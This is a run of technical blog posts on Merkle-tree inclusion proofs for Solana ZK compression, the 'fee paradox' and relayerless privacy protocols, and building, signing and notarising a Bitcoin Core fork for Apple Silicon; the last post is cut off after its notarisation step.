so for $N = 2^k$ there's exactly one peak, and for $N$ between powers of two the peak count is bounded by $\lceil \log_2 N \rceil$. An inclusion proof for a leaf in an MMR is the path within its containing perfect tree (size $\le \log_2 N$), plus the peaks of the other trees (size $< \log_2 N$). Total:

$$
|\pi_{\text{MMR}}| \le 2 \log_2 N \cdot s
$$

with $s$ the hash output size. Slightly larger than a balanced tree, but the *update* is $O(\log N)$ amortised with constant cost per appended leaf in the steady state, which matters for high-throughput deposit workloads. [Todd's original spec](https://github.com/opentimestamps/opentimestamps-server/blob/master/doc/merkle-mountain-range.md) and [Robinson's optimality result (2025)](https://eprint.iacr.org/2025/234) are the references; FlyClient and Mina use MMRs in production.

For [zeraswap](/blog/zeraswap_compressed_amm/) we don't use an MMR — the deposit cadence is interactive enough that the balanced tree dominates — but the design seam is in `programs/zeraswap/src/state.rs` so we can swap if/when the deposit pattern shifts.

## What the on-chain program checks

The on-chain inclusion check is two operations:

1. Recompute the root from the leaf, the index, and the co-path. This is $\log_2 N$ Poseidon hashes. On Solana with the `sol_poseidon` syscall, that's roughly $26 \times 1500 = 39{,}000$ compute units at $h = 26$.
2. Compare the recomputed root against a recent canonical root stored on-chain. Light Protocol keeps a sliding window of recent roots (the rolling-hash update buffer) so that proofs constructed against a root from 5-10 slots ago still verify. This is what makes high-throughput compressed accounts work — you can't force every prover to re-derive a proof on every slot tick.

The on-chain program does not store the leaves. It does not store the inner nodes. It stores the root and the change history, period. The state-cost difference between "32 bytes on chain plus an indexer" and "32 KB per account" is the entire reason ZK Compression got to mainnet on Solana.

<Aside kind="warn">
The "recent roots" window is the part most teams get wrong on first deployment. Too narrow: provers race against the slot tick and proofs become flaky. Too wide: an attacker can construct a proof against an old root that lacks a relevant nullifier or commitment, breaking the privacy invariant. Light Protocol's default of 32 recent roots is the right starting point; we use the same in [zera-sdk-onchain](https://github.com/Dax911/zera-sdk).
</Aside>

## What lives where, in the ZERA stack

To make this concrete:

```
crates/zera-sdk-core/src/merkle.rs        # Rust prover-side path construction
crates/zera-sdk-onchain/src/lib.rs        # on-chain root verification
packages/sdk/src/merkle.ts                # JS path construction (browser wallet)
programs/zeraswap/src/state.rs            # commitment-tree state account layout
```

All four read the same Poseidon parameters (see [the Pedersen post](/blog/pedersen_commitments_in_production/) for why we have four implementations of Poseidon and how they're cross-validated). The same way the Poseidon hash has to agree byte-for-byte across the four implementations, the Merkle tree construction has to agree on:

- Leaf encoding (which fields go into the leaf hash, in what order)
- Internal node encoding (left || right, both 32 bytes, big-endian)
- Default-leaf hash for empty subtrees (Light Protocol uses Poseidon of zero; we match)
- Root format (single 32-byte field element)

If any of these drift, the prover and verifier disagree silently and the protocol stops accepting proofs. We have integration tests in `tests/merkle_cross_impl.rs` that build the same tree from the JS and Rust sides and assert equality at every level. They run in CI on every commit.

## Where this leaves the design space

The thing I keep coming back to: a Merkle tree is the cheapest possible primitive for "prove this thing is in this set" with a logarithmic-size proof. There is no clever lattice, no exotic accumulator, that comes close on the cost-per-byte budget Solana imposes. Verkle trees are interesting on paper and impractical in production for this surface (the polynomial commitment overhead dominates at the leaf counts we care about). KZG-based vector commitments are interesting for trusted-setup-tolerant rollups and overkill for a privacy pool.

So the answer is the boring one. A balanced binary Merkle tree, height 26, Poseidon hash, default-zero subtrees, sliding window of 32 recent roots. It is what Light Protocol shipped, what [zera-sdk](/blog/zera_sdk_scaffolding/) ships, and what every serious Solana privacy stack will ship through the rest of the decade. The interesting work is in the layers above (the SNARK that uses the inclusion proof, the nullifier set that enforces single-spend, the curve choice underneath the hash) — see [the curve post](/blog/why_bn254_and_when_to_switch/) for that.

## Further reading

- [ZK Compression Whitepaper](https://www.zkcompression.com/references/whitepaper) — Light Protocol, 2024 — the canonical compressed-account spec.
- [Merkle Mountain Ranges are optimal](https://eprint.iacr.org/2025/234) — Robinson (2025) — proves the MMR is space-optimal among append-only authenticated dictionaries.
- [Light Protocol account-compression program](https://github.com/Lightprotocol/light-protocol/tree/main/programs/account-compression) — the on-chain implementation.
- [`Dax911/z_trade/programs/zeraswap`](https://github.com/Dax911/z_trade/tree/main/programs/zeraswap) — production Rust shape for the compressed-AMM use case.
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — what we hash into the leaves.
- [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — the dual structure that prevents double-spends.
- [zeraswap: a compressed AMM](/blog/zeraswap_compressed_amm/) — sister piece on the trading layer that lives on top of these trees.


---

# The fee paradox: why every smart-contract privacy mixer needs a relayer

Canonical: https://blog.skill-issue.dev/blog/the_fee_paradox/
Description: On account-model chains the very act of paying a transaction fee deanonymises the recipient. This post formalises the paradox, walks through three resolutions, and sets up the SPST construction that resolves it inside the ZK proof itself.
Published: 2026-04-28T16:00:00.000Z
Tags: zk, cryptography, privacy, tornado-cash, railgun, pedersen, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The first time I read the Tornado Cash whitepaper I missed the fee paragraph. I noticed the Merkle inclusion, the nullifier hash, the snarkjs circuit. I did not notice the part where, *to actually withdraw to a fresh address*, you need somebody else to broadcast the transaction. It was buried under "operator/relayer" — a word I generously read as "convenience". It is not a convenience. It is the load-bearing wall of every smart-contract privacy mixer in production.

This post is post 2 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. [Post 1](/blog/relayerless_privacy_intro/) introduced the framework $\mathcal{F}_{\text{RP}}$ and outlined what the rest of the series builds. Here we slow down on the fee paradox itself — what it is, why every system using fees in a public token suffers it, and the three approaches that resolve it.

<Aside kind="note">
This is the cleanest formalisation of the fee paradox I'm aware of. Most prior work either describes it informally or works around it implicitly. If you've ever asked "why can't I just send my own withdrawal" and gotten a hand-wave, this post is for you.
</Aside>

## Definition: the fee paradox

On any blockchain $\mathcal{B}$ with a fee-based inclusion mechanism:

1. To submit a transaction, the submitter's address must pay a gas fee $f > 0$.
2. To hold gas, the address must have been previously funded.
3. Funding an address creates an on-chain link to the funding source.

Therefore, **any address that submits a transaction has a traceable funding history**. Any privacy-preserving withdrawal to a fresh (unfunded) address requires an external party to pay the gas fee.

Formally, in the **fee paradox game**:

1. User $\mathcal{U}$ deposits value $v$ into a shielded pool.
2. $\mathcal{U}$ wishes to withdraw to a fresh $\mathsf{addr}_{\mathsf{recv}}$ with no prior on-chain history.
3. Adversary $\mathcal{A}$ observes all transactions.
4. If $\mathcal{U}$ funds $\mathsf{addr}_{\mathsf{recv}}$ to pay gas, $\mathcal{A}$ traces the funding source.
5. $\mathcal{A}$ wins by linking the withdrawal to a prior deposit with non-negligible advantage.

$$
\mathsf{Adv}^{\mathsf{FeeParadox}}_{\mathcal{A}}(\lambda) \;\geq\; 1 - \mathsf{negl}(\lambda) \quad \text{in standard blockchain models.}
$$

The advantage is overwhelming. The deck is stacked because the chain literally requires an attestation from a funded account before it will include any state transition. Privacy at the cryptographic layer collides with funding at the consensus layer, and the consensus layer wins.

## Why UTXO chains don't have this problem

Bitcoin and Zcash inherit a different model. A UTXO transaction's "fee" is the difference between input value and output value:

$$
f \;=\; \sum_i v^{\mathrm{in}}_i \;-\; \sum_j v^{\mathrm{out}}_j.
$$

The miner takes $f$ as the implicit fee. There is no separate "gas account" that needs to exist beforehand. In Zcash specifically, a Sapling or Orchard transaction's `valueBalance` field — the net flow from the shielded pool to the transparent pool — *is* the fee. The binding signature proves the value commitment balance. The miner is paid out of value the prover is already moving, signed by the prover, with the prover's identity hidden by the ZK proof.

Result: **Zcash is relayer-free by construction**. Penumbra, Aleo, Namada, and Monero are too — for the same reason. They all run on chains whose native fee model is fee-from-balance, not gas-from-account.

The fee paradox is specific to **account-model chains** like Ethereum and Solana, where transactions require an explicit fee payer signature and the fee is debited from a known account.

## Three approaches to resolution

The paper section §2.3 enumerates three approaches to resolving the paradox without a relayer:

### Approach A — Protocol-Native Fee Abstraction via ZK Fee Proofs

The fee is extracted from the shielded pool *inside the ZK proof itself*. The proof attests that

$$
\sum_{i=1}^{n_{\mathsf{in}}} v_i \;=\; \sum_{j=1}^{n_{\mathsf{out}}} v'_j \;+\; f
$$

where $f$ is a public input to the proof and $v_i, v'_j$ are private inputs. Pedersen commitments make this clean: with $C_i = v_i \cdot G + r_i \cdot H$ for input notes and $C'_j = v'_j \cdot G + r'_j \cdot H$ for output notes,

$$
\sum_i C_i \;=\; \sum_j C'_j \;+\; f \cdot G \;+\; r_\Delta \cdot H,
$$

where $r_\Delta = \sum_i r_i - \sum_j r'_j$ is a blinding-factor residual that the prover demonstrates equals the right thing.

The validator extracts $f$ as inclusion compensation directly. The submitter does not need a public balance. This is what SPST does, and it's the path the whole series builds toward.

### Approach B — Nullifier-Derived Fee Authorization

A second derivation from the spending key, parallel to the nullifier:

$$
\mathsf{nullifier} = \mathsf{PRF}_k(\rho), \qquad
\mathsf{fee\_auth} = \mathsf{PRF}_k(\rho \,\|\, \text{``fee''} \,\|\, f).
$$

The ZK proof proves both come from the same $(k, \rho)$, that $\mathsf{fee\_auth}$ encodes $f$, and that the underlying note has sufficient balance. The fee is bound to the nullifier cryptographically — no party can alter the fee post-proof-generation.

This is more invasive than Approach A (changes the nullifier scheme) but gives a stronger non-malleability property. Most production designs use Approach A; Approach B becomes interesting when the protocol wants stricter binding for compliance audits.

### Approach C — Recursive Fee Amortization via Batch Proofs

For high-frequency private transactions, fold $n$ proofs into a single Nova-style accumulator:

$$
\mathsf{FoldedProof}_n \;=\; \mathsf{Fold}(\mathsf{FoldedProof}_{n-1}, \, (\mathsf{tx}_n, w_n)).
$$

The folded proof attests that all $n$ transactions are individually valid and that the cumulative fee $F_n = \sum_{k=1}^n f_k$ has been correctly accumulated. A single on-chain verification covers all $n$ transactions.

On Solana, with ~200,000 CU per Groth16 verification and a per-transaction limit of ~1,400,000 CU, batches of $n \leq 7$ fit within a single transaction's compute budget. The amortised per-transaction CU cost drops by an order of magnitude.

### Tradeoff summary

<TradeoffTable rows={[
  { aspect: 'Approach A (ZK fee proof)',      pros: 'Smallest circuit overhead, no extra nullifier, clean Pedersen homomorphism', cons: 'Fee amount $f$ is public (necessary for validator compensation)' },
  { aspect: 'Approach B (Nullifier-derived)', pros: 'Cryptographic binding of fee to spending key; non-malleable', cons: 'Doubles the PRF calls; fee changes mean new nullifier scheme' },
  { aspect: 'Approach C (Folded batch)',      pros: 'Amortises verification cost across $n$ transactions', cons: 'Requires Nova/SuperNova folding; off-chain coordination overhead' },
]}/>

## What the relayer-dependent protocols do instead

Tornado Cash, RAILGUN, and Light Protocol's older privacy phase all chose **none of the above**. They use a relayer who pays the gas in the host chain's native asset, takes a fee from the withdrawn amount, and broadcasts the transaction. The architecture is roughly:

<Mermaid id="relayer-flow" code={`flowchart LR
  U[User] -->|"1- Build ZK proof locally"| U
  U -->|"2- Send proof + nullifier + recipient + fee"| R[Relayer]
  R -->|"3- Pay gas in native asset"| R
  R -->|"4- Broadcast withdrawal tx"| P[Privacy Contract]
  P -->|"5- Verify proof, check nullifier"| P
  P -->|"6- N minus f tokens to recipient"| U
  P -->|"7- f tokens fee to relayer"| R
  classDef actor stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  class U,R,P actor
`}/>

The proof is binding — the relayer cannot redirect funds, cannot change the fee — but the relayer **can refuse to broadcast**. They can also log the user's IP, timing, and metadata. In RAILGUN this is mitigated by routing over the Waku P2P network; in Tornado Cash it was just an HTTPS endpoint. Either way: the relayer is a third party, and that third party is a regulatory and operational single point of failure.

## What changes when fees are folded into the proof

Once the fee comes from inside the proof, three things become different:

1. **The submitter does not need a balance.** The transaction can be broadcast by the user themselves from a fresh address that has zero of the host chain's native asset. The chain's transaction-broadcasting interface accepts transactions from any party with a valid signature; that signature now binds nothing to the user's identity.

2. **The validator gets paid out of the shielded pool's escrow.** On Solana, this is realised by having the privacy program's PDA hold a lamport reserve. The fee $f$ — proven inside the SPST proof — authorises a transfer from this reserve to the validator. The shielded pool's internal accounting decrements by $f$. Every deposit replenishes the reserve.

3. **Censorship surface collapses.** There is no "approved relayer list" for an adversary to attack. There is no operator to subpoena. The user's only dependency is **chain liveness** — and that's what Solana's PoS consensus guarantees.

This is the Self-Sovereignty Theorem in informal form. The next post ([SPST](/blog/spst_self_paying_shielded_transactions/)) makes it formal.

<Aside kind="warn">
None of this eliminates the *fee amount* leak. The fee $f$ is necessarily public — the validator has to see it to know they're being paid. But the per-transaction fee tier reveals only $O(\log f_{\max})$ bits, and within a fee tier all SPST transactions are indistinguishable. Standardising fees (ZIP-317-style) tightens this further.
</Aside>

## Bibliography

- Pertsev, A., Semenov, R., Storm, R. (2019). *Tornado Cash Privacy Solution v1.4.* https://berkeley-defi.github.io/assets/material/Tornado%20Cash%20Whitepaper.pdf
- RAILGUN Documentation. *Privacy System Architecture.* https://docs.railgun.org
- Hopwood, D. et al. (2016–2026). *Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf
- Pedersen, T. P. (1991). *Non-Interactive and Information-Theoretic Secure Verifiable Secret Sharing.* CRYPTO 1991.
- Kothapalli, A., Setty, S., Tzialla, I. (2022). *Nova: Recursive Zero-Knowledge Arguments from Folding Schemes.* https://eprint.iacr.org/2021/370

Previous: [Series intro ←](/blog/relayerless_privacy_intro/) · Next: [SPST: self-paying shielded transactions →](/blog/spst_self_paying_shielded_transactions/)


---

# Relayerless privacy on a Turing-complete L1: an intro to F_RP

Canonical: https://blog.skill-issue.dev/blog/relayerless_privacy_intro/
Description: A series-opening map of the relayerless full-privacy framework I've been writing up. Five cryptographic games, four constructions (SPST, PPST, TAB, UPEE), one main theorem — and why it matters that the target chain is Solana.
Published: 2026-04-26T15:00:00.000Z
Tags: zk, cryptography, privacy, solana, vanta, research, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

I've been writing a paper. Working title: *Relayerless Full-Privacy Framework for Turing-Complete Blockchain Systems*. I keep calling it $\mathcal{F}_{\text{RP}}$ in my notebook, and I'll keep doing that here. The shape of it is a quintuple of protocols — $\mathsf{Setup}$, $\mathsf{Shield}$, $\mathsf{Transfer}$, $\mathsf{Unshield}$, $\mathsf{Execute}$ — that together aim to do something every existing privacy system on a smart-contract chain refuses to do: **let the user finish a private transaction without paying anyone but a validator**.

This post is the orientation. Subsequent posts in the series step through each construction in detail with proofs, circuit costs, and Solana instantiation numbers. Here I want to set the table — what problem $\mathcal{F}_{\text{RP}}$ targets, what games formalise it, and how the four pieces compose.

<Aside kind="note">
This is post 1 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. It's also a working preview of the full preprint, which lives at [`src/content/papers/`](/papers) and which I keep editing in public.
</Aside>

## The relayer problem, in one paragraph

Submit a private withdrawal on Tornado Cash from a fresh address. The contract runs the proof, accepts it, and tries to send 1 ETH to your fresh address. Except the *fresh* address has zero ETH and cannot pay gas. So you can't *be* the submitter — somebody else has to broadcast the transaction with their own ETH and bill you for it. That somebody is the **relayer**. The relayer breaks the on-chain link between your deposit and your withdrawal address, but in exchange they observe everything: your IP, your timing, the recipient address, the fee you accept, and which proof maps to which deposit. They are also a **single regulatory point of failure**, as everyone in the West learned in August 2022 when [OFAC sanctioned Tornado Cash](https://www.mayerbrown.com/en/insights/publications/2024/12/federal-appeals-court-tosses-ofac-sanctions-on-tornado-cash) and the registered relayers stopped operating. The user funds were not seized — they were merely *unspendable* because the relayer infrastructure went dark.

Zcash, Penumbra, and Aleo don't need relayers because they are their own chains. Aztec doesn't need relayers because it is its own L2 with its own sequencer. Tornado Cash, RAILGUN, and Light Protocol's older privacy phase need relayers because they are smart-contract layers on a host chain whose fees must be paid in the host chain's native asset by an address that already has it.

What I want — and what $\mathcal{F}_{\text{RP}}$ delivers — is a privacy protocol that runs as a smart-contract layer on a Turing-complete L1, where the only thing the protocol needs from the outside world is **liveness**: the chain keeps making blocks, and any valid transaction eventually gets included.

## Five games that pin down "relayer dependence"

Section 1 of the paper formalises five distinct failure modes that emerge from relayer dependence. Every one of them is an active threat against currently deployed protocols. I'll quote them tersely; the full game definitions are in the paper.

<TradeoffTable rows={[
  { aspect: 'Liveness Failure',  pros: 'Adversary forces relayer set offline → user cannot withdraw within $T_{\\max}$ blocks.', cons: 'Wins with overwhelming probability when $\\mathcal{A}$ controls all relayers; e.g. OFAC TC 2022.' },
  { aspect: 'Information Leakage', pros: 'Relayer observes withdrawal metadata: timing, recipient, fee, IP.', cons: 'Distinguishing advantage non-negligible for any logging relayer.' },
  { aspect: 'Trust & Censorship',  pros: 'Relayer selectively refuses to submit based on $P(\\mathsf{addr}_{\\mathsf{recv}})$.', cons: 'Censorship probability = 1 when $\\mathcal{A}$ controls $\\mathcal{R}$. Funds binding does not save liveness.' },
  { aspect: 'Regulatory Surface', pros: 'Government adversary identifies relayer operators as legally liable entities.', cons: 'Sanctions / criminal charges → all relayers offline → withdrawal mechanism disabled.' },
  { aspect: 'Economic Extraction', pros: 'Relayer charges supracompetitive fees, frontruns correlated trades, sells ordering info to MEV searchers.', cons: 'Rational adversary extracts non-negligible profit; PPE binding does not bound timing/metadata leaks.' },
]}/>

The point of formalising these as games is the same point Goldwasser, Micali, and Rackoff made about zero-knowledge proofs in 1985: until you've written down what an adversary can do and how it wins, you have no theorem to prove. The five games above are what every honest analysis of a privacy protocol owes the reader.

## What we want, formally

$\mathcal{F}_{\text{RP}} = (\mathsf{Setup}, \mathsf{Shield}, \mathsf{Transfer}, \mathsf{Unshield}, \mathsf{Execute})$ — five protocols, each a PPT algorithm, with the following five desiderata:

**D1 (Full Privacy).** For any PPT adversary with full view of chain state $\sigma$ and any two valid transactions $\mathsf{tx}_0, \mathsf{tx}_1$ (different senders / recipients / amounts / programs):

$$
\mathsf{Adv}^{\mathsf{priv}}_{\mathcal{A}}(\lambda) \;=\; \bigl|\,\Pr[\mathcal{A}(\sigma, \mathsf{tx}_0) = 1] - \Pr[\mathcal{A}(\sigma, \mathsf{tx}_1) = 1]\,\bigr| \;\leq\; \mathsf{negl}(\lambda).
$$

**D2 (Self-Sovereignty).** For every protocol operation $\mathsf{Op}$ and any adversary controlling all network participants except the user $\mathcal{U}$, $\mathcal{U}$ still completes $\mathsf{Op}$ with overwhelming probability — assuming only that the underlying chain $\mathcal{B}$ provides liveness.

**D3 (Composability).** Private state transitions can invoke arbitrary smart contract logic. For any arithmetic circuit $C: \mathbb{F}^n \to \mathbb{F}^m$ with $|C|$ gates, the framework supports $\mathsf{Execute}(\mathsf{pp}, C, \cdot, \cdot)$ with proof generation cost polynomial in $|C|$.

**D4 (Succinctness).** On-chain verification cost $O(1)$ pairings or $O(\log n)$ hash evaluations. Proof size $O(1)$ or $O(\log^2 n)$.

**D5 (No / Universal Trusted Setup).** Either no setup (transparent) or a universal SRS that is updatable by any party.

If you've read [the post on Halo2](/blog/halo2_in_2026_what_changed/) you'll recognise D5 as the "no per-circuit ceremony" requirement. D1, D2, D3, D4 are the standard four for a privacy SNARK; D2 is the one the existing relayer-dependent protocols silently violate.

## Four constructions

The framework decomposes into four primitives, each addressing one piece of the problem:

<Mermaid id="frp-construction-stack" code={`graph TD
  A[SPST<br/>Self-Paying Shielded Transactions] --> D[UPEE<br/>Universal Private Execution Environment]
  B[PPST<br/>Private Programmable State Transitions] --> D
  C[TAB<br/>Threshold-Anonymous Broadcast] --> D
  D --> E[Theorem 3.12<br/>Simulation-Based Privacy]
  D --> F[Theorem 3.13<br/>Self-Sovereignty]
  classDef build stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  classDef thm   stroke:#facc15,stroke-width:2px,fill:#0a0a0a,color:#fff
  class A,B,C,D build
  class E,F thm
`}/>

1. **SPST — Self-Paying Shielded Transaction.** A note/commitment/nullifier scheme where the fee $f$ is extracted *inside the ZK proof itself* via a Pedersen-commitment balance equation. The fee paradox dies here. ([Post 3](/blog/spst_self_paying_shielded_transactions/).)

2. **PPST — Private Programmable State Transitions.** SPST generalised so that the proof attests to correct execution of an arbitrary arithmetic circuit $C$ over committed pre-state and post-state. This is what makes the framework Turing-complete. ([Post 4](/blog/ppst_private_programmable_state/).)

3. **TAB — Threshold-Anonymous Broadcast.** Network-layer anonymity, using ring signatures (Approach A) or FROST-style threshold Schnorr (Approach B) to hide which of $n$ participants actually submitted the transaction. ([Post 5](/blog/tab_threshold_anonymous_broadcast/).)

4. **UPEE — Universal Private Execution Environment.** The composition: $(\mathsf{Setup}, \mathsf{Deploy}, \mathsf{Invoke}, \mathsf{Verify}, \mathsf{Finalize})$. UPEE is what gets deployed to a chain. ([Post 7](/blog/upee_universal_private_execution/).)

The two main theorems sit on top of the stack:

- **Theorem 3.12 (Simulation-Based Privacy).** For any PPT adversary controlling the blockchain there exists a PPT simulator $\mathcal{S}$ such that $\{\mathsf{View}_{\mathcal{A}}(\mathsf{Real})\} \approx_c \{\mathsf{View}_{\mathcal{A}}(\mathsf{Ideal})\}$, where $\mathcal{S}$ learns only that *some* valid transaction occurred and *some* fee was paid.
- **Theorem 3.13 (Self-Sovereignty).** $\Pr[\mathsf{Game}_{\mathrm{RF}}(\mathcal{A}, \lambda) = 1] = 1 - \mathsf{negl}(\lambda)$ for any adversary $\mathcal{A}$ controlling all network participants except the user.

The first theorem is the "this is private" theorem; the second is the "you don't need a relayer" theorem. The series will derive both.

## Why Solana, specifically

I keep being asked why I'm building this on Solana instead of writing yet another L1. The honest answer:

1. The chain already exists, has 65k+ TPS theoretical throughput, and sub-second finality.
2. Native `alt_bn128` syscalls (added in v1.16) make Groth16 verification cost **< 200,000 CU** on-chain — that's roughly $0.02 per private transaction.
3. The 1,232-byte transaction limit is tight but not impossible: SPST fits in **656 bytes**. SIMD-0296 (approved late 2025) raises this to 4,096 bytes.
4. Light Protocol's [ZK Compression](https://www.zkcompression.com/resources/whitepaper) infrastructure already provides Poseidon Merkle trees and Groth16 verification — most of the substrate I need.

<Quote attribution="Anatoly Yakovenko, multiple times in 2024">
The chain doesn't get to lie about what it ran. So make the chain run something that doesn't tell anyone anything.
</Quote>

Solana is also the only general-purpose Turing-complete L1 that has shipped pairing-friendly elliptic-curve precompiles to the validator runtime. Ethereum has had `EIP-197` since the Byzantium fork (2017), but the gas costs make Groth16 verification on Ethereum L1 cost ~$5 per proof at typical gas prices. Solana's per-CU pricing brings that down by ~400×.

## What's coming in the series

<Aside kind="note">
Each post stands alone. If you're already familiar with the note/commitment/nullifier model, you can skip Post 3 and pick up at Post 4 (PPST). If you only care about the Solana side, jump to Post 8 (instantiation).
</Aside>

| # | Slug | What it covers |
|---|------|----------------|
| 2 | [`the_fee_paradox`](/blog/the_fee_paradox/) | Why every smart-contract privacy protocol needs a relayer (or doesn't) |
| 3 | [`spst_self_paying_shielded_transactions`](/blog/spst_self_paying_shielded_transactions/) | SPST construction, balance theorem, double-spend resistance, unlinkability proof |
| 4 | [`ppst_private_programmable_state`](/blog/ppst_private_programmable_state/) | Generalising SPST to arbitrary computation; PPST relation; PPST-SPST composition |
| 5 | [`tab_threshold_anonymous_broadcast`](/blog/tab_threshold_anonymous_broadcast/) | Ring signatures over Ed25519 + FROST threshold Schnorr |
| 6 | [`verifiable_shuffles_for_privacy`](/blog/verifiable_shuffles_for_privacy/) | Bayer-Groth shuffles for network-layer mixing |
| 7 | [`upee_universal_private_execution`](/blog/upee_universal_private_execution/) | UPEE deploy / invoke / verify; the simulation-based privacy theorem |
| 8 | [`solana_instantiation_656_bytes`](/blog/solana_instantiation_656_bytes/) | Concrete Solana instantiation with CU + transaction-byte budgets |
| 9 | [`f_rp_vs_existing_privacy_systems`](/blog/f_rp_vs_existing_privacy_systems/) | F_RP vs Zcash, Tornado, Railgun, Aztec, Penumbra, Aleo, Namada, Monero |
| 10 | [`mev_resistance_in_private_execution`](/blog/mev_resistance_in_private_execution/) | Sandwich-proofness; bounding MEV by public-bit leakage |
| 11 | [`post_quantum_relayerless_path`](/blog/post_quantum_relayerless_path/) | Lattice commitments, STARK wrapping, isogeny credentials |

## Bibliography for this post

- Aylor, H. (2026). *Relayerless Full-Privacy Framework for Turing-Complete Blockchain Systems.* Preprint, Zera Labs. (The paper this series is derived from. Final PDF will land at `/papers/relayerless-privacy/` once typeset.)
- Ben-Sasson, E. et al. (2014). *Zerocash: Decentralized Anonymous Payments from Bitcoin.* IEEE S&P 2014.
- Hopwood, D. et al. (2016–2026). *Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf
- Pertsev, A., Semenov, R., Storm, R. (2019). *Tornado Cash Privacy Solution v1.4.*
- Mayer Brown (2024). *Federal Appeals Court Tosses OFAC Sanctions on Tornado Cash.*

Next post: [The fee paradox →](/blog/the_fee_paradox/)


---

# Cross-compiling vantad for darwin: Apple Silicon, sign + notarise

Canonical: https://blog.skill-issue.dev/blog/vanta_darwin_apple_silicon_build/
Description: Shipping vantad as a notarised Mac binary inside a Tauri app meant fixing libconsensus link order, building Rust release with the right target triple, signing every sidecar, and stapling the DMG separately. The notes from the trenches.
Published: 2026-04-13T18:25:14.000Z
Tags: vanta, darwin, macos, apple-silicon, tauri, codesign


The 2026-04-13 commit `eff33f7a chain+build: mined genesis nonce + libconsensus links FFI` and the 2026-04-23 commit `0edddc82 build: darwin frameworks, wallet-ui node types, v2 test renames` are the bookends of the macOS build story. In between is a week of "why does my dylib not load" and "why does Gatekeeper not trust this DMG even though everything inside it is signed."

This post is the field notes from cross-compiling `vantad` for darwin-aarch64, signing everything that needs signing, notarising what needs notarising, and stapling the DMG so users don't see "this came from the internet" prompts. Everything I describe is in [`vanta-desktop/build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) and the [`doc/build-osx.md`](https://github.com/Dax911/vanta/blob/main/doc/build-osx.md) it leans on. The goal is so an engineer running their first ARM Mac doesn't have to repeat the mistakes.

## What you actually have to ship

A Vanta desktop install on macOS contains three sidecar binaries inside one signed `.app`:

- `vantad-aarch64-apple-darwin` — the C++ Bitcoin Core fork
- `vanta-cli-aarch64-apple-darwin` — the matching CLI
- `vanta-node-aarch64-apple-darwin` — the Rust L2 sidecar

Plus the Tauri host binary (`Vanta Wallet`) and the WebView assets. All of this rides inside a `.dmg` that has to itself be notarised separately.

There's a sentence I'm going to repeat because it tripped me twice: **on macOS Tauri 2.x notarises the `.app`, not the `.dmg` that wraps it.** Gatekeeper checks the file the user *downloaded*, which is the DMG. So you have to submit the DMG to `notarytool` separately and staple the resulting ticket. This is documented in approximately zero places. I figured it out by attempting to install my own DMG on a clean VM and watching Gatekeeper refuse it with a generic error.

## The build sequence

The release script does seven steps. I'll narrate them.

**Step 1: build `vantad`.** This is the C++ Bitcoin Core fork's autotools build:

```bash
./autogen.sh
./configure --without-gui --disable-tests --disable-bench \
            --without-bdb --without-miniupnpc --without-natpmp
make -j$(sysctl -n hw.ncpu)
```

The `--without-bdb --without-miniupnpc --without-natpmp` flags are the canonical "don't pull in dependencies the wallet doesn't need" set. BerkeleyDB only matters for legacy wallets, miniupnpc is for UPnP NAT traversal, natpmp is the same on Apple's stack. Skipping them shaves 30+ MB and a bunch of failure modes off the binary.

`--without-gui` is because we're not shipping `vanta-qt`. The Qt UI is *also* possible to ship — the upstream Bitcoin Core team supports it — but on Vanta the desktop wallet *is* the Tauri app, and the C++ binary is just a sidecar. No need for two UIs.

**Step 2: build `vanta-node`.**

```bash
cd vanta && cargo build --release -p vanta-node
```

Cargo handles the cross-compile to whatever the host target is. On an Apple Silicon Mac that produces the `aarch64-apple-darwin` binary you want. On Intel macs you'd get `x86_64-apple-darwin`; the Tauri sidecar resolution in [`node.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) handles both.

The `target_triple()` helper in `node.rs` makes the runtime resolution honest:

```rust
pub fn target_triple() -> &'static str {
    if cfg!(target_os = "macos") {
        if cfg!(target_arch = "aarch64") {
            "aarch64-apple-darwin"
        } else {
            "x86_64-apple-darwin"
        }
    } else if cfg!(target_os = "linux") {
        "x86_64-unknown-linux-gnu"
    } else {
        "x86_64-pc-windows-msvc"
    }
}
```

The host binary discovers its sidecars by appending the target triple suffix. This is also how Tauri itself decides which file to bundle — `tauri.conf.json` declares `"binaries/vantad"` and the bundler looks for `vantad-aarch64-apple-darwin` next to the conf.

**Step 3: copy the sidecars.**

```bash
cp "$REPO_ROOT/src/bitcoind"             "$BINDIR/vantad-$TRIPLE"
cp "$REPO_ROOT/src/bitcoin-cli"          "$BINDIR/vanta-cli-$TRIPLE"
cp "$REPO_ROOT/vanta/target/release/vanta-node" "$BINDIR/vanta-node-$TRIPLE"
```

The C++ binary is still called `bitcoind` after the upstream fork (we haven't renamed the actual file in `src/` because that breaks too much of the upstream build); we rename it during the copy.

**Step 4: install frontend deps.** `pnpm install`. Vite/Tauri build needs the React app's deps for the bundler.

**Step 5: build the Tauri app.** `pnpm tauri build`. Tauri auto-signs the `.app` (and every binary inside it) with the Developer ID identity declared in [`tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json):

```json
"macOS": {
    "signingIdentity": "474F624D8F3783B4D607CFF2331AD4C6CC26A1B5",
    "providerShortName": "9HD4Q82U58",
    "entitlements": "entitlements.plist",
    "minimumSystemVersion": "10.15"
}
```

Tauri also auto-notarises the `.app` if `APPLE_ID`, `APPLE_PASSWORD`, and `APPLE_TEAM_ID` are set in the environment. The release script reads them from `.env.local`. If they're missing the script prints a warning and proceeds without notarisation — useful for local dev builds.

**Step 6: notarise the DMG separately.**

```bash
xcrun notarytool submit "$DMG_PATH" \
  --apple-id "$APPLE_ID" \
  --password "$APPLE_PASSWORD" \
  --team-id "$APPLE_TEAM_ID" \
  --wait

xcrun stapler staple "$DMG_PATH"
```

